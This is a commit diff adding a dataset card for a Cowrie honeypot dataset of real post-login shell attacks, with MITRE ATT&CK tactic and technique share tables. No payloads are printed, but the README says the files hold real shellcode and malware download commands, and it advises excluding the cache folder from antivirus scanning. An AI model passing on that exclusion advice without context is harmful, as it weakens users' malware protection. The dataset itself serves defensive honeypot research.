Datasets:
zyw commited on
Add Shell Attack Evolution Dataset (SRDS 2025)
Browse files- .gitattributes +4 -59
- README.md +255 -0
- attack_ttp/derived_session_coverage_tactics.jsonl +19 -0
- attack_ttp/derived_session_coverage_techniques.jsonl +49 -0
- attack_ttp/paper_tactics.jsonl +9 -0
- attack_ttp/paper_techniques.jsonl +27 -0
- commands/2021_2022.jsonl +0 -0
- commands/2024.jsonl +0 -0
- raw_samples/cowrie_ssh_2024_sample.jsonl +300 -0
- request_response/curated.jsonl +0 -0
- request_response/vm_replay_2021_2022.jsonl +3 -0
- sessions/2021_2022.jsonl +0 -0
- sessions/2024.jsonl +0 -0
.gitattributes
CHANGED
|
@@ -1,60 +1,5 @@
|
|
| 1 |
-
|
| 2 |
-
|
| 3 |
-
|
| 4 |
-
*.
|
| 5 |
-
*.bz2 filter=lfs diff=lfs merge=lfs -text
|
| 6 |
-
*.ckpt filter=lfs diff=lfs merge=lfs -text
|
| 7 |
-
*.ftz filter=lfs diff=lfs merge=lfs -text
|
| 8 |
-
*.gz filter=lfs diff=lfs merge=lfs -text
|
| 9 |
-
*.h5 filter=lfs diff=lfs merge=lfs -text
|
| 10 |
-
*.joblib filter=lfs diff=lfs merge=lfs -text
|
| 11 |
-
*.lfs.* filter=lfs diff=lfs merge=lfs -text
|
| 12 |
-
*.lz4 filter=lfs diff=lfs merge=lfs -text
|
| 13 |
-
*.mds filter=lfs diff=lfs merge=lfs -text
|
| 14 |
-
*.mlmodel filter=lfs diff=lfs merge=lfs -text
|
| 15 |
-
*.model filter=lfs diff=lfs merge=lfs -text
|
| 16 |
-
*.msgpack filter=lfs diff=lfs merge=lfs -text
|
| 17 |
-
*.npy filter=lfs diff=lfs merge=lfs -text
|
| 18 |
-
*.npz filter=lfs diff=lfs merge=lfs -text
|
| 19 |
-
*.onnx filter=lfs diff=lfs merge=lfs -text
|
| 20 |
-
*.ot filter=lfs diff=lfs merge=lfs -text
|
| 21 |
*.parquet filter=lfs diff=lfs merge=lfs -text
|
| 22 |
-
*.pb filter=lfs diff=lfs merge=lfs -text
|
| 23 |
-
*.pickle filter=lfs diff=lfs merge=lfs -text
|
| 24 |
-
*.pkl filter=lfs diff=lfs merge=lfs -text
|
| 25 |
-
*.pt filter=lfs diff=lfs merge=lfs -text
|
| 26 |
-
*.pth filter=lfs diff=lfs merge=lfs -text
|
| 27 |
-
*.rar filter=lfs diff=lfs merge=lfs -text
|
| 28 |
-
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
| 29 |
-
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
| 30 |
-
*.tar.* filter=lfs diff=lfs merge=lfs -text
|
| 31 |
-
*.tar filter=lfs diff=lfs merge=lfs -text
|
| 32 |
-
*.tflite filter=lfs diff=lfs merge=lfs -text
|
| 33 |
-
*.tgz filter=lfs diff=lfs merge=lfs -text
|
| 34 |
-
*.wasm filter=lfs diff=lfs merge=lfs -text
|
| 35 |
-
*.xz filter=lfs diff=lfs merge=lfs -text
|
| 36 |
-
*.zip filter=lfs diff=lfs merge=lfs -text
|
| 37 |
-
*.zst filter=lfs diff=lfs merge=lfs -text
|
| 38 |
-
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
| 39 |
-
# Audio files - uncompressed
|
| 40 |
-
*.pcm filter=lfs diff=lfs merge=lfs -text
|
| 41 |
-
*.sam filter=lfs diff=lfs merge=lfs -text
|
| 42 |
-
*.raw filter=lfs diff=lfs merge=lfs -text
|
| 43 |
-
# Audio files - compressed
|
| 44 |
-
*.aac filter=lfs diff=lfs merge=lfs -text
|
| 45 |
-
*.flac filter=lfs diff=lfs merge=lfs -text
|
| 46 |
-
*.mp3 filter=lfs diff=lfs merge=lfs -text
|
| 47 |
-
*.ogg filter=lfs diff=lfs merge=lfs -text
|
| 48 |
-
*.wav filter=lfs diff=lfs merge=lfs -text
|
| 49 |
-
# Image files - uncompressed
|
| 50 |
-
*.bmp filter=lfs diff=lfs merge=lfs -text
|
| 51 |
-
*.gif filter=lfs diff=lfs merge=lfs -text
|
| 52 |
-
*.png filter=lfs diff=lfs merge=lfs -text
|
| 53 |
-
*.tiff filter=lfs diff=lfs merge=lfs -text
|
| 54 |
-
# Image files - compressed
|
| 55 |
-
*.jpg filter=lfs diff=lfs merge=lfs -text
|
| 56 |
-
*.jpeg filter=lfs diff=lfs merge=lfs -text
|
| 57 |
-
*.webp filter=lfs diff=lfs merge=lfs -text
|
| 58 |
-
# Video files - compressed
|
| 59 |
-
*.mp4 filter=lfs diff=lfs merge=lfs -text
|
| 60 |
-
*.webm filter=lfs diff=lfs merge=lfs -text
|
|
|
|
| 1 |
+
# Hugging Face: store large data files via Git LFS.
|
| 2 |
+
# JSONL data files (the request_response/vm_replay split is ~18 MB) and any
|
| 3 |
+
# generated Parquet go through LFS; the small CSV / Markdown stay as plain text.
|
| 4 |
+
*.jsonl filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 5 |
*.parquet filter=lfs diff=lfs merge=lfs -text
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
README.md
ADDED
|
@@ -0,0 +1,255 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
---
|
| 2 |
+
license: cc-by-4.0
|
| 3 |
+
language:
|
| 4 |
+
- en
|
| 5 |
+
pretty_name: Shell Honeypot Attack Request–Response Dataset
|
| 6 |
+
tags:
|
| 7 |
+
- cybersecurity
|
| 8 |
+
- honeypot
|
| 9 |
+
- cowrie
|
| 10 |
+
- shell
|
| 11 |
+
- mitre-attack
|
| 12 |
+
- intrusion-detection
|
| 13 |
+
- threat-intelligence
|
| 14 |
+
task_categories:
|
| 15 |
+
- text-generation
|
| 16 |
+
- text-classification
|
| 17 |
+
size_categories:
|
| 18 |
+
- 10K<n<100K
|
| 19 |
+
configs:
|
| 20 |
+
- config_name: commands
|
| 21 |
+
data_files:
|
| 22 |
+
- split: "2021_2022"
|
| 23 |
+
path: "commands/2021_2022.jsonl"
|
| 24 |
+
- split: "2024"
|
| 25 |
+
path: "commands/2024.jsonl"
|
| 26 |
+
- config_name: sessions
|
| 27 |
+
data_files:
|
| 28 |
+
- split: "2021_2022"
|
| 29 |
+
path: "sessions/2021_2022.jsonl"
|
| 30 |
+
- split: "2024"
|
| 31 |
+
path: "sessions/2024.jsonl"
|
| 32 |
+
- config_name: request_response
|
| 33 |
+
default: true
|
| 34 |
+
data_files:
|
| 35 |
+
- split: "curated"
|
| 36 |
+
path: "request_response/curated.jsonl"
|
| 37 |
+
- split: "vm_replay_2021_2022"
|
| 38 |
+
path: "request_response/vm_replay_2021_2022.jsonl"
|
| 39 |
+
- config_name: attack_ttp_tactics_paper
|
| 40 |
+
data_files:
|
| 41 |
+
- split: "train"
|
| 42 |
+
path: "attack_ttp/paper_tactics.jsonl"
|
| 43 |
+
- config_name: attack_ttp_techniques_paper
|
| 44 |
+
data_files:
|
| 45 |
+
- split: "train"
|
| 46 |
+
path: "attack_ttp/paper_techniques.jsonl"
|
| 47 |
+
- config_name: attack_ttp_tactics_derived
|
| 48 |
+
data_files:
|
| 49 |
+
- split: "train"
|
| 50 |
+
path: "attack_ttp/derived_session_coverage_tactics.jsonl"
|
| 51 |
+
- config_name: attack_ttp_techniques_derived
|
| 52 |
+
data_files:
|
| 53 |
+
- split: "train"
|
| 54 |
+
path: "attack_ttp/derived_session_coverage_techniques.jsonl"
|
| 55 |
+
---
|
| 56 |
+
|
| 57 |
+
# Shell Honeypot Attack Request–Response Dataset
|
| 58 |
+
|
| 59 |
+
A standardized, MITRE ATT&CK–annotated dataset of **post-login shell
|
| 60 |
+
attacks** captured by [Cowrie](https://github.com/cowrie/cowrie) SSH/Telnet
|
| 61 |
+
honeypots across two collection periods — **2021–2022** and **2024**. It pairs
|
| 62 |
+
attacker shell commands with **real captured system responses**, enabling both
|
| 63 |
+
longitudinal threat analysis and the training/evaluation of AI-driven honeypots.
|
| 64 |
+
|
| 65 |
+
This is the open-source release accompanying the paper [*“Unveiling Evolving
|
| 66 |
+
Threats: A Data Analysis for Next-Generation Honeypot Development”*](https://ieeexplore.ieee.org/document/11360425/)
|
| 67 |
+
(IEEE SRDS 2025).
|
| 68 |
+
|
| 69 |
+
## Why this dataset
|
| 70 |
+
|
| 71 |
+
Honeypot research has long been held back by the absence of an open, high-fidelity
|
| 72 |
+
**request–response** dataset. Most public corpora contain isolated attack logs
|
| 73 |
+
with no system responses, making it impossible to benchmark how convincingly a
|
| 74 |
+
honeypot *replies* to an attacker. This dataset addresses that gap by providing:
|
| 75 |
+
|
| 76 |
+
- **Real system responses** for attacker commands (captured by replaying attacks
|
| 77 |
+
inside instrumented production-like environments), not just the requests.
|
| 78 |
+
- **A longitudinal pair of periods** (2021–2022 vs. 2024) with comparable volume,
|
| 79 |
+
enabling study of how shell-attack tactics evolve.
|
| 80 |
+
- **Per-session MITRE ATT&CK technique sequences**, so each interaction is mapped
|
| 81 |
+
to adversary tactics and techniques.
|
| 82 |
+
- **A harm/severity index `Vi ∈ [0,4]`** on the curated request–response split, for
|
| 83 |
+
training response-risk classifiers.
|
| 84 |
+
|
| 85 |
+
## Dataset structure
|
| 86 |
+
|
| 87 |
+
The dataset is published as loadable JSONL configs. `request_response`
|
| 88 |
+
is the **default** config.
|
| 89 |
+
|
| 90 |
+
| Config | Splits | Rows | One row = |
|
| 91 |
+
|---|---|---:|---|
|
| 92 |
+
| `request_response` *(default)* | `vm_replay_2021_2022`, `curated` | 1,512 / 1,489 | a single `command → real system response` turn |
|
| 93 |
+
| `commands` | `2021_2022`, `2024` | 12,923 / 4,236 | a unique shell command + its frequency, complexity, and abstracted pattern |
|
| 94 |
+
| `sessions` | `2021_2022`, `2024` | 5,365 / 6,658 | one effective attack session (commands grouped by attacker IP) + its ATT&CK technique sequence |
|
| 95 |
+
| `attack_ttp_tactics_paper` | `train` | 9 | SRDS Table VI — ATT&CK tactic usage share per period (authoritative) |
|
| 96 |
+
| `attack_ttp_techniques_paper` | `train` | 26 | SRDS Table VII — ATT&CK technique usage share per period (authoritative) |
|
| 97 |
+
| `attack_ttp_tactics_derived` | `train` | 19 | per-session tactic coverage recomputed from the released sessions (supplementary) |
|
| 98 |
+
| `attack_ttp_techniques_derived` | `train` | 49 | per-session technique coverage recomputed from the released sessions (supplementary) |
|
| 99 |
+
|
| 100 |
+
```python
|
| 101 |
+
from datasets import load_dataset
|
| 102 |
+
|
| 103 |
+
# Flagship request–response interactions (real captured responses)
|
| 104 |
+
rr = load_dataset("<your-hf-namespace>/shell-attack-evolution-dataset",
|
| 105 |
+
"request_response", split="curated")
|
| 106 |
+
print(rr[0])
|
| 107 |
+
|
| 108 |
+
# Per-period sessions with ATT&CK technique sequences
|
| 109 |
+
sess = load_dataset("<your-hf-namespace>/shell-attack-evolution-dataset",
|
| 110 |
+
"sessions", split="2024")
|
| 111 |
+
```
|
| 112 |
+
|
| 113 |
+
### `commands`
|
| 114 |
+
Each unique command observed in a period.
|
| 115 |
+
|
| 116 |
+
| Field | Type | Description |
|
| 117 |
+
|---|---|---|
|
| 118 |
+
| `command` | string | the raw shell command as typed by the attacker |
|
| 119 |
+
| `period` | string | `2021_2022` or `2024` |
|
| 120 |
+
| `frequency` | int | number of times this exact command was observed |
|
| 121 |
+
| `is_complex` | bool | true if the command contains shell operators (`\| & ; > < \`` `$(`) |
|
| 122 |
+
| `command_pattern` | string \| null | the abstracted operator pattern (parameters stripped) |
|
| 123 |
+
|
| 124 |
+
### `sessions`
|
| 125 |
+
Each effective attack session = all post-authentication commands from one
|
| 126 |
+
attacker IP, in order.
|
| 127 |
+
|
| 128 |
+
| Field | Type | Description |
|
| 129 |
+
|---|---|---|
|
| 130 |
+
| `session_id` | string | stable anonymized id, `sha1(period\|ip)[:12]` |
|
| 131 |
+
| `period` | string | `2021_2022` or `2024` |
|
| 132 |
+
| `src_ip` | string | attacker source IP (see *Ethics* below) |
|
| 133 |
+
| `commands` | list[string] | ordered commands issued in the session |
|
| 134 |
+
| `command_count` | int | session length (number of commands) |
|
| 135 |
+
| `session_pattern` | string \| null | the session's command-pattern signature |
|
| 136 |
+
| `attack_techniques` | list[string] | ordered MITRE ATT&CK techniques invoked (consecutive duplicates collapsed) |
|
| 137 |
+
|
| 138 |
+
### `request_response` *(flagship)*
|
| 139 |
+
A single attacker turn paired with the **real** system response.
|
| 140 |
+
|
| 141 |
+
| Field | Type | Description |
|
| 142 |
+
|---|---|---|
|
| 143 |
+
| `session_id` | string | session this turn belongs to |
|
| 144 |
+
| `period` | string | origin period of the attack commands |
|
| 145 |
+
| `turn_index` | int | 0-based position of the turn within the session |
|
| 146 |
+
| `command` | string | the attacker request |
|
| 147 |
+
| `response` | string | the real terminal/system response |
|
| 148 |
+
| `system_change` | string \| null | natural-language description of the induced system state change (curated split only) |
|
| 149 |
+
| `severity_vi` | int \| null | harm index `Vi ∈ [0,4]`, higher = more dangerous (curated split only) |
|
| 150 |
+
| `response_source` | string | `real_vm` or `curated_ubuntu` (see below) |
|
| 151 |
+
|
| 152 |
+
Two response variants are provided **for the same set of representative
|
| 153 |
+
attack-session templates** (the split key sets are identical), which makes this a
|
| 154 |
+
natural *real-vs-curated* response benchmark:
|
| 155 |
+
|
| 156 |
+
- **`vm_replay_2021_2022`** — raw responses captured by replaying the attacks on a
|
| 157 |
+
real VM (`real_vm`). Locale strings may appear in the original (non-English)
|
| 158 |
+
system language; preserved verbatim for fidelity.
|
| 159 |
+
- **`curated`** — the same sessions replayed in a standardized **Ubuntu 22.04**
|
| 160 |
+
environment (`curated_ubuntu`), with clean English output and two added
|
| 161 |
+
annotations: a `system_change` description and a `severity_vi` harm index.
|
| 162 |
+
|
| 163 |
+
`severity_vi` distribution on the curated split: `0`: 591, `1`: 35, `2`: 669,
|
| 164 |
+
`3`: 71, `4`: 123 (+ a few unscored turns).
|
| 165 |
+
|
| 166 |
+
### `attack_ttp_*` (ATT&CK usage frequencies)
|
| 167 |
+
MITRE ATT&CK usage frequencies, in two views split across four single-table
|
| 168 |
+
configs (each a single `train` split):
|
| 169 |
+
|
| 170 |
+
- **Authoritative (the paper's figures), shipped verbatim** —
|
| 171 |
+
`attack_ttp_tactics_paper` (SRDS Table VI) and `attack_ttp_techniques_paper`
|
| 172 |
+
(Table VII): columns `share_2021_2022`, `share_2024`, `trend` — command-weighted
|
| 173 |
+
shares exactly as reported in the paper (e.g. Defense Evasion `0.0758 → 0.3877`).
|
| 174 |
+
- **Supplementary, derived from the released sessions** —
|
| 175 |
+
`attack_ttp_tactics_derived` / `attack_ttp_techniques_derived`: a per-session
|
| 176 |
+
*coverage* share (`session_count / total_sessions_in_period`) recomputed from
|
| 177 |
+
this dataset. It uses a different denominator than the paper's command-weighted
|
| 178 |
+
share, so values differ; provided for reproducibility, not as the headline
|
| 179 |
+
figure.
|
| 180 |
+
|
| 181 |
+
```python
|
| 182 |
+
from datasets import load_dataset
|
| 183 |
+
tactics = load_dataset("<your-hf-namespace>/shell-attack-evolution-dataset",
|
| 184 |
+
"attack_ttp_tactics_paper", split="train")
|
| 185 |
+
```
|
| 186 |
+
|
| 187 |
+
## Data collection & preprocessing
|
| 188 |
+
|
| 189 |
+
Attacks were captured by Cowrie honeypots deployed on the public Internet
|
| 190 |
+
(2021–2022 sources `cowrie-20210406–20210611` and `cowrie-20220609–20220704`;
|
| 191 |
+
2024 captured over 2024-03-01 – 2024-06-26). Only sessions that successfully
|
| 192 |
+
authenticated and issued commands are retained. Sessions are segmented per
|
| 193 |
+
attacker IP. The raw logs were cleaned for three Cowrie-specific artifacts:
|
| 194 |
+
(1) incorrectly segmented multi-line shell scripts, (2) redundant echo/prompt
|
| 195 |
+
lines wrongly recorded as commands, and (3) repeated automated re-attacks from the
|
| 196 |
+
same source. System responses were collected by **replaying** grouped sessions in
|
| 197 |
+
production-like environments; live malware download URLs were replaced with inert
|
| 198 |
+
local files so that responses could be captured safely. See
|
| 199 |
+
[`../analysis/`](../analysis) for the full, runnable preprocessing pipeline and
|
| 200 |
+
[`../scripts/build_dataset.py`](../scripts/build_dataset.py) for the exact code
|
| 201 |
+
that derives every file here.
|
| 202 |
+
|
| 203 |
+
`raw_samples/cowrie_ssh_2024_sample.jsonl` contains a 300-line sample of the raw
|
| 204 |
+
Cowrie event log format for reference.
|
| 205 |
+
|
| 206 |
+
## Intended uses
|
| 207 |
+
|
| 208 |
+
- **AI-driven honeypot training** — teach a model to generate realistic shell
|
| 209 |
+
responses from `request_response`.
|
| 210 |
+
- **Response-risk classification** — predict `severity_vi` from a command/response.
|
| 211 |
+
- **TTP / threat-intelligence analysis** — study tactic evolution via `sessions`
|
| 212 |
+
and `attack_ttp`.
|
| 213 |
+
- **Honeypot fidelity benchmarking** — compare a candidate honeypot's responses
|
| 214 |
+
against the real `vm_replay` / `curated` responses.
|
| 215 |
+
|
| 216 |
+
## Ethics, safety & limitations
|
| 217 |
+
|
| 218 |
+
- **No malware is distributed.** Binary payloads downloaded during the original
|
| 219 |
+
captures are deliberately excluded; only defanged download URLs / filenames are
|
| 220 |
+
retained for analysis.
|
| 221 |
+
- **Attacker IPs** are included (as is standard for honeypot corpora) because they
|
| 222 |
+
carry research value; they belong to attacking hosts, not victims. A stable
|
| 223 |
+
anonymized `session_id` is also provided if you prefer to drop `src_ip`.
|
| 224 |
+
- Commands may contain credentials/keys that **attackers** typed; these are the
|
| 225 |
+
attackers' own injected values, not third-party secrets.
|
| 226 |
+
- Honeypot data reflects only a subset of global attack activity and is biased by
|
| 227 |
+
deployment geography and the honeypot's emulated profile. Curated responses are
|
| 228 |
+
produced in one standardized environment and may differ from other systems.
|
| 229 |
+
- **Antivirus note (Windows).** Because the `request_response` / `commands`
|
| 230 |
+
fields contain *real* attacker payloads (encoded shellcode, malware download
|
| 231 |
+
commands, etc.), local antivirus — notably Windows Defender — may quarantine the
|
| 232 |
+
cache files `datasets` writes while building the dataset (e.g. `WinError 225`).
|
| 233 |
+
This is an expected false positive on real threat data, not malware in the
|
| 234 |
+
loader. Loading on Linux (incl. the Hugging Face Hub viewer/infra) is unaffected;
|
| 235 |
+
on Windows, add an exclusion for the `~/.cache/huggingface` folder or load with
|
| 236 |
+
`keep_in_memory=True`.
|
| 237 |
+
|
| 238 |
+
## Citation
|
| 239 |
+
|
| 240 |
+
```bibtex
|
| 241 |
+
@inproceedings{wang2025unveiling,
|
| 242 |
+
title = {Unveiling Evolving Threats: A Data Analysis for
|
| 243 |
+
Next-Generation Honeypot Development},
|
| 244 |
+
author = {Wang, Ziyang and Lv, Shichao and Wang, Haining and You, Jianzhou
|
| 245 |
+
and Liu, Shuoyang and Yuan, Tianwei and Lu, Xiao and Sun, Limin},
|
| 246 |
+
booktitle = {IEEE International Symposium on Reliable Distributed Systems (SRDS)},
|
| 247 |
+
year = {2025},
|
| 248 |
+
url = {https://ieeexplore.ieee.org/document/11360425/}
|
| 249 |
+
}
|
| 250 |
+
```
|
| 251 |
+
|
| 252 |
+
## License
|
| 253 |
+
|
| 254 |
+
Released under **CC BY 4.0**. The accompanying code in this repository is under
|
| 255 |
+
the MIT License.
|
attack_ttp/derived_session_coverage_tactics.jsonl
ADDED
|
@@ -0,0 +1,19 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"period": "2021_2022", "tactic": "Execution", "session_count": 5240, "session_share": 0.976701}
|
| 2 |
+
{"period": "2021_2022", "tactic": "Discovery", "session_count": 4306, "session_share": 0.80261}
|
| 3 |
+
{"period": "2021_2022", "tactic": "Defense Evasion", "session_count": 4001, "session_share": 0.74576}
|
| 4 |
+
{"period": "2021_2022", "tactic": "Collection", "session_count": 3972, "session_share": 0.740354}
|
| 5 |
+
{"period": "2021_2022", "tactic": "Privilege Escalation", "session_count": 3340, "session_share": 0.622554}
|
| 6 |
+
{"period": "2021_2022", "tactic": "Persistence", "session_count": 3243, "session_share": 0.604473}
|
| 7 |
+
{"period": "2021_2022", "tactic": "Unmapped", "session_count": 3219, "session_share": 0.6}
|
| 8 |
+
{"period": "2021_2022", "tactic": "Command and Control", "session_count": 1112, "session_share": 0.207269}
|
| 9 |
+
{"period": "2021_2022", "tactic": "Impact", "session_count": 8, "session_share": 0.001491}
|
| 10 |
+
{"period": "2024", "tactic": "Defense Evasion", "session_count": 5609, "session_share": 0.842445}
|
| 11 |
+
{"period": "2024", "tactic": "Privilege Escalation", "session_count": 4943, "session_share": 0.742415}
|
| 12 |
+
{"period": "2024", "tactic": "Persistence", "session_count": 4937, "session_share": 0.741514}
|
| 13 |
+
{"period": "2024", "tactic": "Discovery", "session_count": 2190, "session_share": 0.328928}
|
| 14 |
+
{"period": "2024", "tactic": "Execution", "session_count": 1799, "session_share": 0.270201}
|
| 15 |
+
{"period": "2024", "tactic": "Unmapped", "session_count": 741, "session_share": 0.111295}
|
| 16 |
+
{"period": "2024", "tactic": "Command and Control", "session_count": 567, "session_share": 0.085161}
|
| 17 |
+
{"period": "2024", "tactic": "Collection", "session_count": 67, "session_share": 0.010063}
|
| 18 |
+
{"period": "2024", "tactic": "Impact", "session_count": 27, "session_share": 0.004055}
|
| 19 |
+
{"period": "2024", "tactic": "Credential Access", "session_count": 7, "session_share": 0.001051}
|
attack_ttp/derived_session_coverage_techniques.jsonl
ADDED
|
@@ -0,0 +1,49 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
{"period": "2021_2022", "technique_id": "T1059", "technique": "T1059 Command and Scripting Interpreter", "tactics": "Execution", "session_count": 5240, "session_share": 0.976701}
|
| 2 |
+
{"period": "2021_2022", "technique_id": "T1083", "technique": "T1083 File and Directory Discovery", "tactics": "Discovery", "session_count": 4241, "session_share": 0.790494}
|
| 3 |
+
{"period": "2021_2022", "technique_id": "T1082", "technique": "T1082 System Information Discovery", "tactics": "Discovery", "session_count": 4007, "session_share": 0.746878}
|
| 4 |
+
{"period": "2021_2022", "technique_id": "T1005", "technique": "T1005 Data from Local System", "tactics": "Collection", "session_count": 3972, "session_share": 0.740354}
|
| 5 |
+
{"period": "2021_2022", "technique_id": "T1087", "technique": "T1087 Account Discovery", "tactics": "Discovery", "session_count": 3336, "session_share": 0.621808}
|
| 6 |
+
{"period": "2021_2022", "technique_id": "T1098", "technique": "T1098 Account Manipulation", "tactics": "Persistence; Privilege Escalation", "session_count": 3243, "session_share": 0.604473}
|
| 7 |
+
{"period": "2021_2022", "technique_id": "T1222", "technique": "T1222 File and Directory Permissions Modification", "tactics": "Defense Evasion", "session_count": 3223, "session_share": 0.600746}
|
| 8 |
+
{"period": "2021_2022", "technique_id": "T1053", "technique": "T1053 Scheduled Task/Job", "tactics": "Persistence; Privilege Escalation", "session_count": 3219, "session_share": 0.6}
|
| 9 |
+
{"period": "2021_2022", "technique_id": "T1057", "technique": "T1057 Process Discovery", "tactics": "Unmapped", "session_count": 3179, "session_share": 0.592544}
|
| 10 |
+
{"period": "2021_2022", "technique_id": "T1105", "technique": "T1105 Ingress Tool Transfer", "tactics": "Command and Control", "session_count": 1112, "session_share": 0.207269}
|
| 11 |
+
{"period": "2021_2022", "technique_id": "T1070", "technique": "T1070 Indicator Removal", "tactics": "Defense Evasion", "session_count": 888, "session_share": 0.165517}
|
| 12 |
+
{"period": "2021_2022", "technique_id": "T1036", "technique": "T1036 Masquerading", "tactics": "Defense Evasion", "session_count": 851, "session_share": 0.158621}
|
| 13 |
+
{"period": "2021_2022", "technique_id": "T1027", "technique": "T1027 Obfuscated Files or Information", "tactics": "Defense Evasion", "session_count": 128, "session_share": 0.023858}
|
| 14 |
+
{"period": "2021_2022", "technique_id": "T1548", "technique": "T1548 Abuse Elevation Control Mechanism", "tactics": "Defense Evasion; Privilege Escalation", "session_count": 97, "session_share": 0.01808}
|
| 15 |
+
{"period": "2021_2022", "technique_id": "T1016", "technique": "T1016 System Network Configuration Discovery", "tactics": "Discovery", "session_count": 48, "session_share": 0.008947}
|
| 16 |
+
{"period": "2021_2022", "technique_id": "T1424", "technique": "T1424 Process Discovery", "tactics": "Discovery", "session_count": 40, "session_share": 0.007456}
|
| 17 |
+
{"period": "2021_2022", "technique_id": "T1037", "technique": "T1037 Boot or Logon Initialization Scripts", "tactics": "Unmapped", "session_count": 39, "session_share": 0.007269}
|
| 18 |
+
{"period": "2021_2022", "technique_id": "T1489", "technique": "T1489 Service Stop", "tactics": "Impact", "session_count": 6, "session_share": 0.001118}
|
| 19 |
+
{"period": "2021_2022", "technique_id": "T1564", "technique": "T1564 Hide Artifacts", "tactics": "Defense Evasion", "session_count": 3, "session_share": 0.000559}
|
| 20 |
+
{"period": "2021_2022", "technique_id": "T1124", "technique": "T1124 System Time Discovery", "tactics": "Discovery", "session_count": 3, "session_share": 0.000559}
|
| 21 |
+
{"period": "2021_2022", "technique_id": "T1655", "technique": "T1655 Masquerading", "tactics": "Defense Evasion", "session_count": 3, "session_share": 0.000559}
|
| 22 |
+
{"period": "2021_2022", "technique_id": "T1531", "technique": "T1531 Account Access Removal", "tactics": "Impact", "session_count": 2, "session_share": 0.000373}
|
| 23 |
+
{"period": "2021_2022", "technique_id": "T1518", "technique": "T1518 Software Discovery", "tactics": "Discovery", "session_count": 2, "session_share": 0.000373}
|
| 24 |
+
{"period": "2021_2022", "technique_id": "T1120", "technique": "T1120 Peripheral Device Discovery", "tactics": "Unmapped", "session_count": 1, "session_share": 0.000186}
|
| 25 |
+
